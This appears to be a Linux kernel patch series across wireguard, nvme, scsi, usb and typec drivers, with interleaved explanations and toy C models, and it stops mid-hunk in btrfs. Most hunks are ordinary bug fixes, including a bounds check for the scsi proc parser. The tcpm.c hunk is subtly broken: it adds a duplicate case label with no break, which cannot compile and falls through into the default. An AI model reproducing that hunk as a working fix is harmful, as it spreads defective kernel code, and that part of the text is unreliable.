+index 19eac00b23814..c51c794e70a0e 100644
+--- a/drivers/net/wireguard/selftest/allowedips.c
++++ b/drivers/net/wireguard/selftest/allowedips.c
+@@ -593,16 +593,20 @@ bool __init wg_allowedips_selftest(void)
+ 	wg_allowedips_remove_by_peer(&t, a, &mutex);
+ 	test_negative(4, a, 192, 168, 0, 1);
+ 
+-	/* These will hit the WARN_ON(len >= MAX_ALLOWEDIPS_BITS) in free_node
++	/* These will hit the WARN_ON(len >= MAX_ALLOWEDIPS_DEPTH) in free_node
+ 	 * if something goes wrong.
+ 	 */
+-	for (i = 0; i < MAX_ALLOWEDIPS_BITS; ++i) {
+-		part = cpu_to_be64(~(1LLU << (i % 64)));
+-		memset(&ip, 0xff, 16);
+-		memcpy((u8 *)&ip + (i < 64) * 8, &part, 8);
++	for (i = 0; i < 64; ++i) {
++		part = cpu_to_be64(~0LLU << i);
++		memset(&ip, 0xff, 8);
++		memcpy((u8 *)&ip + 8, &part, 8);
++		wg_allowedips_insert_v6(&t, &ip, 128, a, &mutex);
++		memcpy(&ip, &part, 8);
++		memset((u8 *)&ip + 8, 0, 8);
+ 		wg_allowedips_insert_v6(&t, &ip, 128, a, &mutex);
+ 	}
+-
++	memset(&ip, 0, 16);
++	wg_allowedips_insert_v6(&t, &ip, 128, a, &mutex);
+ 	wg_allowedips_free(&t, &mutex);
+ 
+ 	wg_allowedips_init(&t);
+diff --git a/drivers/net/wireless/realtek/rtw89/mac.c b/drivers/net/wireless/realtek/rtw89/mac.c
+index 077fddc5fa1ea..4a1c9e18c5301 100644
+--- a/drivers/net/wireless/realtek/rtw89/mac.c
++++ b/drivers/net/wireless/realtek/rtw89/mac.c
+@@ -2209,7 +2209,7 @@ static int cmac_dma_init(struct rtw89_dev *rtwdev, u8 mac_idx)
+ 	u32 reg;
+ 	int ret;
+ 
+-	if (chip_id != RTL8852A && chip_id != RTL8852B)
++	if (chip_id != RTL8852B)
+ 		return 0;
+ 
+ 	ret = rtw89_mac_check_mac_en(rtwdev, mac_idx, RTW89_CMAC_SEL);
+diff --git a/drivers/nvme/host/pci.c b/drivers/nvme/host/pci.c
+index ce2e628f94a05..b30269f5e68fb 100644
+--- a/drivers/nvme/host/pci.c
++++ b/drivers/nvme/host/pci.c
+@@ -3504,7 +3504,8 @@ static const struct pci_device_id nvme_id_table[] = {
+ 	{ PCI_DEVICE(0x1d97, 0x2263),   /* SPCC */
+ 		.driver_data = NVME_QUIRK_DISABLE_WRITE_ZEROES, },
+ 	{ PCI_DEVICE(0x144d, 0xa80b),   /* Samsung PM9B1 256G and 512G */
+-		.driver_data = NVME_QUIRK_DISABLE_WRITE_ZEROES, },
++		.driver_data = NVME_QUIRK_DISABLE_WRITE_ZEROES |
++				NVME_QUIRK_BOGUS_NID, },
+ 	{ PCI_DEVICE(0x144d, 0xa809),   /* Samsung MZALQ256HBJD 256G */
+ 		.driver_data = NVME_QUIRK_DISABLE_WRITE_ZEROES, },
+ 	{ PCI_DEVICE(0x1cc4, 0x6303),   /* UMIS RPJTJ512MGE1QDY 512G */
+diff --git a/drivers/nvme/host/rdma.c b/drivers/nvme/host/rdma.c
+index 80383213b8828..c478480f54aa2 100644
+--- a/drivers/nvme/host/rdma.c
++++ b/drivers/nvme/host/rdma.c
+@@ -923,6 +923,7 @@ static int nvme_rdma_configure_io_queues(struct nvme_rdma_ctrl *ctrl, bool new)
+ 		goto out_cleanup_tagset;
+ 
+ 	if (!new) {
++		nvme_start_freeze(&ctrl->ctrl);
+ 		nvme_start_queues(&ctrl->ctrl);
+ 		if (!nvme_wait_freeze_timeout(&ctrl->ctrl, NVME_IO_TIMEOUT)) {
+ 			/*
+@@ -931,6 +932,7 @@ static int nvme_rdma_configure_io_queues(struct nvme_rdma_ctrl *ctrl, bool new)
+ 			 * to be safe.
+ 			 */
+ 			ret = -ENODEV;
++			nvme_unfreeze(&ctrl->ctrl);
+ 			goto out_wait_freeze_timed_out;
+ 		}
+ 		blk_mq_update_nr_hw_queues(ctrl->ctrl.tagset,
+@@ -980,7 +982,6 @@ static void nvme_rdma_teardown_io_queues(struct nvme_rdma_ctrl *ctrl,
+ 		bool remove)
+ {
+ 	if (ctrl->ctrl.queue_count > 1) {
+-		nvme_start_freeze(&ctrl->ctrl);
+ 		nvme_stop_queues(&ctrl->ctrl);
+ 		nvme_sync_io_queues(&ctrl->ctrl);
+ 		nvme_rdma_stop_io_queues(ctrl);
+diff --git a/drivers/nvme/host/tcp.c b/drivers/nvme/host/tcp.c
+index 8f17cbec5a0e4..f2fedd25915f9 100644
+--- a/drivers/nvme/host/tcp.c
++++ b/drivers/nvme/host/tcp.c
+@@ -1890,6 +1890,7 @@ static int nvme_tcp_configure_io_queues(struct nvme_ctrl *ctrl, bool new)
+ 		goto out_cleanup_connect_q;
+ 
+ 	if (!new) {
++		nvme_start_freeze(ctrl);
+ 		nvme_start_queues(ctrl);
+ 		if (!nvme_wait_freeze_timeout(ctrl, NVME_IO_TIMEOUT)) {
+ 			/*
+@@ -1898,6 +1899,7 @@ static int nvme_tcp_configure_io_queues(struct nvme_ctrl *ctrl, bool new)
+ 			 * to be safe.
+ 			 */
+ 			ret = -ENODEV;
++			nvme_unfreeze(ctrl);
+ 			goto out_wait_freeze_timed_out;
+ 		}
+ 		blk_mq_update_nr_hw_queues(ctrl->tagset,
+@@ -2002,7 +2004,6 @@ static void nvme_tcp_teardown_io_queues(struct nvme_ctrl *ctrl,
+ 	if (ctrl->queue_count <= 1)
+ 		return;
+ 	nvme_stop_admin_queue(ctrl);
+-	nvme_start_freeze(ctrl);
+ 	nvme_stop_queues(ctrl);
+ 	nvme_sync_io_queues(ctrl);
+ 	nvme_tcp_stop_io_queues(ctrl);
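
Both the nvme-rdma and nvme-tcp hunks move nvme_start_freeze() out of the
teardown path and into configure_io_queues(), right before the freeze wait,
and add nvme_unfreeze() on the timeout error path. The invariant being
restored is that every started freeze is balanced on every exit. A toy
model of that pairing (illustrative, not the nvme code):

#include <stdbool.h>

struct ctrl {
	int freeze_depth;
	bool frozen_waited_ok;	/* simulates the wait outcome */
};

static void start_freeze(struct ctrl *c) { c->freeze_depth++; }
static void unfreeze(struct ctrl *c)     { c->freeze_depth--; }

static int configure_io_queues(struct ctrl *c, bool new)
{
	if (!new) {
		start_freeze(c);
		if (!c->frozen_waited_ok) {	/* wait_freeze timed out */
			unfreeze(c);		/* balance before bailing */
			return -1;
		}
		/* ...update hw queue count under the freeze... */
		unfreeze(c);
	}
	return 0;
}
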
+diff --git a/drivers/platform/x86/serial-multi-instantiate.c b/drivers/platform/x86/serial-multi-instantiate.c
+index 5362f1a7b77c5..7a9c758e95472 100644
+--- a/drivers/platform/x86/serial-multi-instantiate.c
++++ b/drivers/platform/x86/serial-multi-instantiate.c
+@@ -21,6 +21,7 @@
+ #define IRQ_RESOURCE_NONE	0
+ #define IRQ_RESOURCE_GPIO	1
+ #define IRQ_RESOURCE_APIC	2
++#define IRQ_RESOURCE_AUTO	3
+ 
+ enum smi_bus_type {
+ 	SMI_I2C,
+@@ -52,6 +53,18 @@ static int smi_get_irq(struct platform_device *pdev, struct acpi_device *adev,
+ 	int ret;
+ 
+ 	switch (inst->flags & IRQ_RESOURCE_TYPE) {
++	case IRQ_RESOURCE_AUTO:
++		ret = acpi_dev_gpio_irq_get(adev, inst->irq_idx);
++		if (ret > 0) {
++			dev_dbg(&pdev->dev, "Using gpio irq\n");
++			break;
++		}
++		ret = platform_get_irq(pdev, inst->irq_idx);
++		if (ret > 0) {
++			dev_dbg(&pdev->dev, "Using platform irq\n");
++			break;
++		}
++		break;
+ 	case IRQ_RESOURCE_GPIO:
+ 		ret = acpi_dev_gpio_irq_get(adev, inst->irq_idx);
+ 		break;
+@@ -308,10 +321,23 @@ static const struct smi_node int3515_data = {
+ 
+ static const struct smi_node cs35l41_hda = {
+ 	.instances = {
+-		{ "cs35l41-hda", IRQ_RESOURCE_GPIO, 0 },
+-		{ "cs35l41-hda", IRQ_RESOURCE_GPIO, 0 },
+-		{ "cs35l41-hda", IRQ_RESOURCE_GPIO, 0 },
+-		{ "cs35l41-hda", IRQ_RESOURCE_GPIO, 0 },
++		{ "cs35l41-hda", IRQ_RESOURCE_AUTO, 0 },
++		{ "cs35l41-hda", IRQ_RESOURCE_AUTO, 0 },
++		{ "cs35l41-hda", IRQ_RESOURCE_AUTO, 0 },
++		{ "cs35l41-hda", IRQ_RESOURCE_AUTO, 0 },
++		{}
++	},
++	.bus_type = SMI_AUTO_DETECT,
++};
++
++static const struct smi_node cs35l56_hda = {
++	.instances = {
++		{ "cs35l56-hda", IRQ_RESOURCE_AUTO, 0 },
++		{ "cs35l56-hda", IRQ_RESOURCE_AUTO, 0 },
++		{ "cs35l56-hda", IRQ_RESOURCE_AUTO, 0 },
++		{ "cs35l56-hda", IRQ_RESOURCE_AUTO, 0 },
++		/* a 5th entry is an alias address, not a real device */
++		{ "cs35l56-hda_dummy_dev" },
+ 		{}
+ 	},
+ 	.bus_type = SMI_AUTO_DETECT,
+@@ -325,6 +351,7 @@ static const struct acpi_device_id smi_acpi_ids[] = {
+ 	{ "BSG1160", (unsigned long)&bsg1160_data },
+ 	{ "BSG2150", (unsigned long)&bsg2150_data },
+ 	{ "CSC3551", (unsigned long)&cs35l41_hda },
++	{ "CSC3556", (unsigned long)&cs35l56_hda },
+ 	{ "INT3515", (unsigned long)&int3515_data },
+ 	/* Non-conforming _HID for Cirrus Logic already released */
+ 	{ "CLSA0100", (unsigned long)&cs35l41_hda },
+diff --git a/drivers/scsi/53c700.c b/drivers/scsi/53c700.c
+index e1e4f9d108879..857be0f3ae5b9 100644
+--- a/drivers/scsi/53c700.c
++++ b/drivers/scsi/53c700.c
+@@ -1598,7 +1598,7 @@ NCR_700_intr(int irq, void *dev_id)
+ 				printk("scsi%d (%d:%d) PHASE MISMATCH IN SEND MESSAGE %d remain, return %p[%04x], phase %s\n", host->host_no, pun, lun, count, (void *)temp, temp - hostdata->pScript, sbcl_to_string(NCR_700_readb(host, SBCL_REG)));
+ #endif
+ 				resume_offset = hostdata->pScript + Ent_SendMessagePhaseMismatch;
+-			} else if(dsp >= to32bit(&slot->pSG[0].ins) &&
++			} else if (slot && dsp >= to32bit(&slot->pSG[0].ins) &&
+ 				  dsp <= to32bit(&slot->pSG[NCR_700_SG_SEGMENTS].ins)) {
+ 				int data_transfer = NCR_700_readl(host, DBC_REG) & 0xffffff;
+ 				int SGcount = (dsp - to32bit(&slot->pSG[0].ins))/sizeof(struct NCR_700_SG_List);
+diff --git a/drivers/scsi/fnic/fnic.h b/drivers/scsi/fnic/fnic.h
+index d82de34f6fd73..e51e92f932fa8 100644
+--- a/drivers/scsi/fnic/fnic.h
++++ b/drivers/scsi/fnic/fnic.h
+@@ -27,7 +27,7 @@
+ 
+ #define DRV_NAME		"fnic"
+ #define DRV_DESCRIPTION		"Cisco FCoE HBA Driver"
+-#define DRV_VERSION		"1.6.0.54"
++#define DRV_VERSION		"1.6.0.55"
+ #define PFX			DRV_NAME ": "
+ #define DFX                     DRV_NAME "%d: "
+ 
+diff --git a/drivers/scsi/fnic/fnic_scsi.c b/drivers/scsi/fnic/fnic_scsi.c
+index 26dbd347156ef..be89ce96df46c 100644
+--- a/drivers/scsi/fnic/fnic_scsi.c
++++ b/drivers/scsi/fnic/fnic_scsi.c
+@@ -2139,7 +2139,7 @@ static int fnic_clean_pending_aborts(struct fnic *fnic,
+ 				     bool new_sc)
+ 
+ {
+-	int ret = SUCCESS;
++	int ret = 0;
+ 	struct fnic_pending_aborts_iter_data iter_data = {
+ 		.fnic = fnic,
+ 		.lun_dev = lr_sc->device,
+@@ -2159,9 +2159,11 @@ static int fnic_clean_pending_aborts(struct fnic *fnic,
+ 
+ 	/* walk again to check, if IOs are still pending in fw */
+ 	if (fnic_is_abts_pending(fnic, lr_sc))
+-		ret = FAILED;
++		ret = 1;
+ 
+ clean_pending_aborts_end:
++	FNIC_SCSI_DBG(KERN_INFO, fnic->lport->host,
++			"%s: exit status: %d\n", __func__, ret);
+ 	return ret;
+ }
+ 
+diff --git a/drivers/scsi/qedf/qedf_main.c b/drivers/scsi/qedf/qedf_main.c
+index ecff2ec83a002..c4f293d39f228 100644
+--- a/drivers/scsi/qedf/qedf_main.c
++++ b/drivers/scsi/qedf/qedf_main.c
+@@ -31,6 +31,7 @@ static void qedf_remove(struct pci_dev *pdev);
+ static void qedf_shutdown(struct pci_dev *pdev);
+ static void qedf_schedule_recovery_handler(void *dev);
+ static void qedf_recovery_handler(struct work_struct *work);
++static int qedf_suspend(struct pci_dev *pdev, pm_message_t state);
+ 
+ /*
+  * Driver module parameters.
+@@ -3276,6 +3277,7 @@ static struct pci_driver qedf_pci_driver = {
+ 	.probe = qedf_probe,
+ 	.remove = qedf_remove,
+ 	.shutdown = qedf_shutdown,
++	.suspend = qedf_suspend,
+ };
+ 
+ static int __qedf_probe(struct pci_dev *pdev, int mode)
+@@ -4005,6 +4007,22 @@ static void qedf_shutdown(struct pci_dev *pdev)
+ 	__qedf_remove(pdev, QEDF_MODE_NORMAL);
+ }
+ 
++static int qedf_suspend(struct pci_dev *pdev, pm_message_t state)
++{
++	struct qedf_ctx *qedf;
++
++	if (!pdev) {
++		QEDF_ERR(NULL, "pdev is NULL.\n");
++		return -ENODEV;
++	}
++
++	qedf = pci_get_drvdata(pdev);
++
++	QEDF_ERR(&qedf->dbg_ctx, "%s: Device does not support suspend operation\n", __func__);
++
++	return -EPERM;
++}
++
+ /*
+  * Recovery handler code
+  */
+diff --git a/drivers/scsi/qedi/qedi_main.c b/drivers/scsi/qedi/qedi_main.c
+index f530bb0364939..9fd68d362698f 100644
+--- a/drivers/scsi/qedi/qedi_main.c
++++ b/drivers/scsi/qedi/qedi_main.c
+@@ -69,6 +69,7 @@ static struct nvm_iscsi_block *qedi_get_nvram_block(struct qedi_ctx *qedi);
+ static void qedi_recovery_handler(struct work_struct *work);
+ static void qedi_schedule_hw_err_handler(void *dev,
+ 					 enum qed_hw_err_type err_type);
++static int qedi_suspend(struct pci_dev *pdev, pm_message_t state);
+ 
+ static int qedi_iscsi_event_cb(void *context, u8 fw_event_code, void *fw_handle)
+ {
+@@ -2510,6 +2511,22 @@ static void qedi_shutdown(struct pci_dev *pdev)
+ 	__qedi_remove(pdev, QEDI_MODE_SHUTDOWN);
+ }
+ 
++static int qedi_suspend(struct pci_dev *pdev, pm_message_t state)
++{
++	struct qedi_ctx *qedi;
++
++	if (!pdev) {
++		QEDI_ERR(NULL, "pdev is NULL.\n");
++		return -ENODEV;
++	}
++
++	qedi = pci_get_drvdata(pdev);
++
++	QEDI_ERR(&qedi->dbg_ctx, "%s: Device does not support suspend operation\n", __func__);
++
++	return -EPERM;
++}
++
+ static int __qedi_probe(struct pci_dev *pdev, int mode)
+ {
+ 	struct qedi_ctx *qedi;
+@@ -2868,6 +2885,7 @@ static struct pci_driver qedi_pci_driver = {
+ 	.remove = qedi_remove,
+ 	.shutdown = qedi_shutdown,
+ 	.err_handler = &qedi_err_handler,
++	.suspend = qedi_suspend,
+ };
+ 
+ static int __init qedi_init(void)
+diff --git a/drivers/scsi/raid_class.c b/drivers/scsi/raid_class.c
+index 898a0bdf8df67..711252e52d8e1 100644
+--- a/drivers/scsi/raid_class.c
++++ b/drivers/scsi/raid_class.c
+@@ -248,6 +248,7 @@ int raid_component_add(struct raid_template *r,struct device *raid_dev,
+ 	return 0;
+ 
+ err_out:
++	put_device(&rc->dev);
+ 	list_del(&rc->node);
+ 	rd->component_count--;
+ 	put_device(component_dev);
+diff --git a/drivers/scsi/scsi_proc.c b/drivers/scsi/scsi_proc.c
+index 95aee1ad13834..7184e169a4a51 100644
+--- a/drivers/scsi/scsi_proc.c
++++ b/drivers/scsi/scsi_proc.c
+@@ -311,7 +311,7 @@ static ssize_t proc_scsi_write(struct file *file, const char __user *buf,
+ 			       size_t length, loff_t *ppos)
+ {
+ 	int host, channel, id, lun;
+-	char *buffer, *p;
++	char *buffer, *end, *p;
+ 	int err;
+ 
+ 	if (!buf || length > PAGE_SIZE)
+@@ -326,10 +326,14 @@ static ssize_t proc_scsi_write(struct file *file, const char __user *buf,
+ 		goto out;
+ 
+ 	err = -EINVAL;
+-	if (length < PAGE_SIZE)
+-		buffer[length] = '\0';
+-	else if (buffer[PAGE_SIZE-1])
+-		goto out;
++	if (length < PAGE_SIZE) {
++		end = buffer + length;
++		*end = '\0';
++	} else {
++		end = buffer + PAGE_SIZE - 1;
++		if (*end)
++			goto out;
++	}
+ 
+ 	/*
+ 	 * Usage: echo "scsi add-single-device 0 1 2 3" >/proc/scsi/scsi
+@@ -338,10 +342,10 @@ static ssize_t proc_scsi_write(struct file *file, const char __user *buf,
+ 	if (!strncmp("scsi add-single-device", buffer, 22)) {
+ 		p = buffer + 23;
+ 
+-		host = simple_strtoul(p, &p, 0);
+-		channel = simple_strtoul(p + 1, &p, 0);
+-		id = simple_strtoul(p + 1, &p, 0);
+-		lun = simple_strtoul(p + 1, &p, 0);
++		host    = (p     < end) ? simple_strtoul(p, &p, 0) : 0;
++		channel = (p + 1 < end) ? simple_strtoul(p + 1, &p, 0) : 0;
++		id      = (p + 1 < end) ? simple_strtoul(p + 1, &p, 0) : 0;
++		lun     = (p + 1 < end) ? simple_strtoul(p + 1, &p, 0) : 0;
+ 
+ 		err = scsi_add_single_device(host, channel, id, lun);
+ 
+@@ -352,10 +356,10 @@ static ssize_t proc_scsi_write(struct file *file, const char __user *buf,
+ 	} else if (!strncmp("scsi remove-single-device", buffer, 25)) {
+ 		p = buffer + 26;
+ 
+-		host = simple_strtoul(p, &p, 0);
+-		channel = simple_strtoul(p + 1, &p, 0);
+-		id = simple_strtoul(p + 1, &p, 0);
+-		lun = simple_strtoul(p + 1, &p, 0);
++		host    = (p     < end) ? simple_strtoul(p, &p, 0) : 0;
++		channel = (p + 1 < end) ? simple_strtoul(p + 1, &p, 0) : 0;
++		id      = (p + 1 < end) ? simple_strtoul(p + 1, &p, 0) : 0;
++		lun     = (p + 1 < end) ? simple_strtoul(p + 1, &p, 0) : 0;
+ 
+ 		err = scsi_remove_single_device(host, channel, id, lun);
+ 	}
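
The scsi_proc hunk bounds every parser step: an explicit end pointer is
computed once, and each "p + 1" hop is checked against it before
simple_strtoul() may dereference it, so a short write like
"scsi add-single-device 0" can no longer read past the buffer. The same
guard in plain C with strtoul (illustrative helper):

#include <stdlib.h>

static void parse_hcil(char *p, const char *end,
		       long *host, long *channel, long *id, long *lun)
{
	/* Each step validates the pointer before strtoul touches it;
	 * out-of-range fields default to 0 instead of reading past end. */
	*host    = (p     < end) ? strtoul(p, &p, 0) : 0;
	*channel = (p + 1 < end) ? strtoul(p + 1, &p, 0) : 0;
	*id      = (p + 1 < end) ? strtoul(p + 1, &p, 0) : 0;
	*lun     = (p + 1 < end) ? strtoul(p + 1, &p, 0) : 0;
}
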
+diff --git a/drivers/scsi/snic/snic_disc.c b/drivers/scsi/snic/snic_disc.c
+index 8fbf3c1b1311d..cd27562ec922e 100644
+--- a/drivers/scsi/snic/snic_disc.c
++++ b/drivers/scsi/snic/snic_disc.c
+@@ -303,6 +303,7 @@ snic_tgt_create(struct snic *snic, struct snic_tgt_id *tgtid)
+ 			      "Snic Tgt: device_add, with err = %d\n",
+ 			      ret);
+ 
++		put_device(&tgt->dev);
+ 		put_device(&snic->shost->shost_gendev);
+ 		spin_lock_irqsave(snic->shost->host_lock, flags);
+ 		list_del(&tgt->list);
+diff --git a/drivers/scsi/storvsc_drv.c b/drivers/scsi/storvsc_drv.c
+index 54a1b8514f04b..83d09c2009280 100644
+--- a/drivers/scsi/storvsc_drv.c
++++ b/drivers/scsi/storvsc_drv.c
+@@ -1670,10 +1670,6 @@ static int storvsc_host_reset_handler(struct scsi_cmnd *scmnd)
+  */
+ static enum blk_eh_timer_return storvsc_eh_timed_out(struct scsi_cmnd *scmnd)
+ {
+-#if IS_ENABLED(CONFIG_SCSI_FC_ATTRS)
+-	if (scmnd->device->host->transportt == fc_transport_template)
+-		return fc_eh_timed_out(scmnd);
+-#endif
+ 	return BLK_EH_RESET_TIMER;
+ }
+ 
+diff --git a/drivers/ufs/host/ufs-renesas.c b/drivers/ufs/host/ufs-renesas.c
+index f8a5e79ed3b4e..ab0652d8705ac 100644
+--- a/drivers/ufs/host/ufs-renesas.c
++++ b/drivers/ufs/host/ufs-renesas.c
+@@ -359,7 +359,7 @@ static int ufs_renesas_init(struct ufs_hba *hba)
+ {
+ 	struct ufs_renesas_priv *priv;
+ 
+-	priv = devm_kmalloc(hba->dev, sizeof(*priv), GFP_KERNEL);
++	priv = devm_kzalloc(hba->dev, sizeof(*priv), GFP_KERNEL);
+ 	if (!priv)
+ 		return -ENOMEM;
+ 	ufshcd_set_variant(hba, priv);
+diff --git a/drivers/usb/common/usb-conn-gpio.c b/drivers/usb/common/usb-conn-gpio.c
+index e20874caba363..3f5180d64931b 100644
+--- a/drivers/usb/common/usb-conn-gpio.c
++++ b/drivers/usb/common/usb-conn-gpio.c
+@@ -42,6 +42,7 @@ struct usb_conn_info {
+ 
+ 	struct power_supply_desc desc;
+ 	struct power_supply *charger;
++	bool initial_detection;
+ };
+ 
+ /*
+@@ -86,11 +87,13 @@ static void usb_conn_detect_cable(struct work_struct *work)
+ 	dev_dbg(info->dev, "role %s -> %s, gpios: id %d, vbus %d\n",
+ 		usb_role_string(info->last_role), usb_role_string(role), id, vbus);
+ 
+-	if (info->last_role == role) {
++	if (!info->initial_detection && info->last_role == role) {
+ 		dev_warn(info->dev, "repeated role: %s\n", usb_role_string(role));
+ 		return;
+ 	}
+ 
++	info->initial_detection = false;
++
+ 	if (info->last_role == USB_ROLE_HOST && info->vbus)
+ 		regulator_disable(info->vbus);
+ 
+@@ -258,6 +261,7 @@ static int usb_conn_probe(struct platform_device *pdev)
+ 	device_set_wakeup_capable(&pdev->dev, true);
+ 
+ 	/* Perform initial detection */
++	info->initial_detection = true;
+ 	usb_conn_queue_dwork(info, 0);
+ 
+ 	return 0;
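
The usb-conn-gpio change adds a one-shot initial_detection flag so the very
first cable scan always reports, even when the detected role happens to
equal the zero-initialised last_role; without it the initial state could be
swallowed as a "repeated role". Minimal model (names illustrative):

#include <stdbool.h>
#include <stdio.h>

struct conn {
	int last_role;
	bool initial_detection;
};

static void detect(struct conn *c, int role)
{
	if (!c->initial_detection && c->last_role == role) {
		printf("repeated role %d, ignored\n", role);
		return;
	}
	c->initial_detection = false;	/* one-shot: only the first pass */
	c->last_role = role;
	printf("role changed to %d\n", role);
}
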
+diff --git a/drivers/usb/dwc3/gadget.c b/drivers/usb/dwc3/gadget.c
+index c3590a0c42035..137602d9076fd 100644
+--- a/drivers/usb/dwc3/gadget.c
++++ b/drivers/usb/dwc3/gadget.c
+@@ -4342,9 +4342,14 @@ static irqreturn_t dwc3_check_event_buf(struct dwc3_event_buffer *evt)
+ 	u32 count;
+ 
+ 	if (pm_runtime_suspended(dwc->dev)) {
++		dwc->pending_events = true;
++		/*
++		 * Trigger runtime resume. The get() function will be balanced
++		 * after processing the pending events in
++		 * dwc3_gadget_process_pending_events().
++		 */
+ 		pm_runtime_get(dwc->dev);
+ 		disable_irq_nosync(dwc->irq_gadget);
+-		dwc->pending_events = true;
+ 		return IRQ_HANDLED;
+ 	}
+ 
+@@ -4609,6 +4614,8 @@ void dwc3_gadget_process_pending_events(struct dwc3 *dwc)
+ {
+ 	if (dwc->pending_events) {
+ 		dwc3_interrupt(dwc->irq_gadget, dwc->ev_buf);
++		dwc3_thread_interrupt(dwc->irq_gadget, dwc->ev_buf);
++		pm_runtime_put(dwc->dev);
+ 		dwc->pending_events = false;
+ 		enable_irq(dwc->irq_gadget);
+ 	}
+diff --git a/drivers/usb/gadget/udc/core.c b/drivers/usb/gadget/udc/core.c
+index 139f471894fb5..316e9cc3987be 100644
+--- a/drivers/usb/gadget/udc/core.c
++++ b/drivers/usb/gadget/udc/core.c
+@@ -795,6 +795,9 @@ EXPORT_SYMBOL_GPL(usb_gadget_disconnect);
+  * usb_gadget_activate() is called.  For example, user mode components may
+  * need to be activated before the system can talk to hosts.
+  *
++ * This routine may sleep; it must not be called in interrupt context
++ * (such as from within a gadget driver's disconnect() callback).
++ *
+  * Returns zero on success, else negative errno.
+  */
+ int usb_gadget_deactivate(struct usb_gadget *gadget)
+@@ -833,6 +836,8 @@ EXPORT_SYMBOL_GPL(usb_gadget_deactivate);
+  * This routine activates gadget which was previously deactivated with
+  * usb_gadget_deactivate() call. It calls usb_gadget_connect() if needed.
+  *
++ * This routine may sleep; it must not be called in interrupt context.
++ *
+  * Returns zero on success, else negative errno.
+  */
+ int usb_gadget_activate(struct usb_gadget *gadget)
+@@ -1611,7 +1616,11 @@ static void gadget_unbind_driver(struct device *dev)
+ 	usb_gadget_disable_async_callbacks(udc);
+ 	if (gadget->irq)
+ 		synchronize_irq(gadget->irq);
++	mutex_unlock(&udc->connect_lock);
++
+ 	udc->driver->unbind(gadget);
++
++	mutex_lock(&udc->connect_lock);
+ 	usb_gadget_udc_stop_locked(udc);
+ 	mutex_unlock(&udc->connect_lock);
+ 
+diff --git a/drivers/usb/storage/alauda.c b/drivers/usb/storage/alauda.c
+index 5e912dd29b4c9..115f05a6201a1 100644
+--- a/drivers/usb/storage/alauda.c
++++ b/drivers/usb/storage/alauda.c
+@@ -318,7 +318,8 @@ static int alauda_get_media_status(struct us_data *us, unsigned char *data)
+ 	rc = usb_stor_ctrl_transfer(us, us->recv_ctrl_pipe,
+ 		command, 0xc0, 0, 1, data, 2);
+ 
+-	usb_stor_dbg(us, "Media status %02X %02X\n", data[0], data[1]);
++	if (rc == USB_STOR_XFER_GOOD)
++		usb_stor_dbg(us, "Media status %02X %02X\n", data[0], data[1]);
+ 
+ 	return rc;
+ }
+@@ -454,9 +455,14 @@ static int alauda_init_media(struct us_data *us)
+ static int alauda_check_media(struct us_data *us)
+ {
+ 	struct alauda_info *info = (struct alauda_info *) us->extra;
+-	unsigned char status[2];
++	unsigned char *status = us->iobuf;
++	int rc;
+ 
+-	alauda_get_media_status(us, status);
++	rc = alauda_get_media_status(us, status);
++	if (rc != USB_STOR_XFER_GOOD) {
++		status[0] = 0xF0;	/* Pretend there's no media */
++		status[1] = 0;
++	}
+ 
+ 	/* Check for no media or door open */
+ 	if ((status[0] & 0x80) || ((status[0] & 0x1F) == 0x10)
+diff --git a/drivers/usb/typec/altmodes/displayport.c b/drivers/usb/typec/altmodes/displayport.c
+index 7cdf83f4c811b..7a3caf556dae9 100644
+--- a/drivers/usb/typec/altmodes/displayport.c
++++ b/drivers/usb/typec/altmodes/displayport.c
+@@ -60,6 +60,7 @@ struct dp_altmode {
+ 
+ 	enum dp_state state;
+ 	bool hpd;
++	bool pending_hpd;
+ 
+ 	struct mutex lock; /* device lock */
+ 	struct work_struct work;
+@@ -144,8 +145,13 @@ static int dp_altmode_status_update(struct dp_altmode *dp)
+ 		dp->state = DP_STATE_EXIT;
+ 	} else if (!(con & DP_CONF_CURRENTLY(dp->data.conf))) {
+ 		ret = dp_altmode_configure(dp, con);
+-		if (!ret)
++		if (!ret) {
+ 			dp->state = DP_STATE_CONFIGURE;
++			if (dp->hpd != hpd) {
++				dp->hpd = hpd;
++				dp->pending_hpd = true;
++			}
++		}
+ 	} else {
+ 		if (dp->hpd != hpd) {
+ 			drm_connector_oob_hotplug_event(dp->connector_fwnode);
+@@ -160,6 +166,16 @@ static int dp_altmode_configured(struct dp_altmode *dp)
+ {
+ 	sysfs_notify(&dp->alt->dev.kobj, "displayport", "configuration");
+ 	sysfs_notify(&dp->alt->dev.kobj, "displayport", "pin_assignment");
++	/*
++	 * If the DFP_D/UFP_D sends a change in HPD when first notifying the
++	 * DisplayPort driver that it is connected, then we wait until
++	 * configuration is complete to signal HPD.
++	 */
++	if (dp->pending_hpd) {
++		drm_connector_oob_hotplug_event(dp->connector_fwnode);
++		sysfs_notify(&dp->alt->dev.kobj, "displayport", "hpd");
++		dp->pending_hpd = false;
++	}
+ 
+ 	return dp_altmode_notify(dp);
+ }
+diff --git a/drivers/usb/typec/tcpm/tcpm.c b/drivers/usb/typec/tcpm/tcpm.c
+index 524099634a1d4..d5950ef9d1f35 100644
+--- a/drivers/usb/typec/tcpm/tcpm.c
++++ b/drivers/usb/typec/tcpm/tcpm.c
+@@ -5322,6 +5322,10 @@ static void _tcpm_pd_vbus_off(struct tcpm_port *port)
+ 		/* Do nothing, vbus drop expected */
+ 		break;
+ 
++	case SNK_HARD_RESET_WAIT_VBUS:
++		/* Do nothing, it's OK to receive vbus off events */
++		break;
++
+ 	default:
+ 		if (port->pwr_role == TYPEC_SINK && port->attached)
+ 			tcpm_set_state(port, SNK_UNATTACHED, tcpm_wait_for_discharge(port));
+@@ -5368,6 +5372,9 @@ static void _tcpm_pd_vbus_vsafe0v(struct tcpm_port *port)
+ 	case SNK_DEBOUNCED:
+ 		/*Do nothing, still waiting for VSAFE5V for connect */
+ 		break;
++	case SNK_HARD_RESET_WAIT_VBUS:
++	case SNK_HARD_RESET_WAIT_VBUS:
++		/* Do nothing, it's OK to receive vbus off events */
+ 	default:
+ 		if (port->pwr_role == TYPEC_SINK && port->auto_vbus_discharge_enabled)
+ 			tcpm_set_state(port, SNK_UNATTACHED, 0);
+diff --git a/fs/btrfs/block-group.c b/fs/btrfs/block-group.c
+index d7aad5e8ee377..3495bc775afa3 100644
+--- a/fs/btrfs/block-group.c
++++ b/fs/btrfs/block-group.c
+@@ -436,13 +436,23 @@ void btrfs_wait_block_group_cache_progress(struct btrfs_block_group *cache,
+ 					   u64 num_bytes)
+ {
+ 	struct btrfs_caching_control *caching_ctl;
++	int progress;
+ 
+ 	caching_ctl = btrfs_get_caching_control(cache);
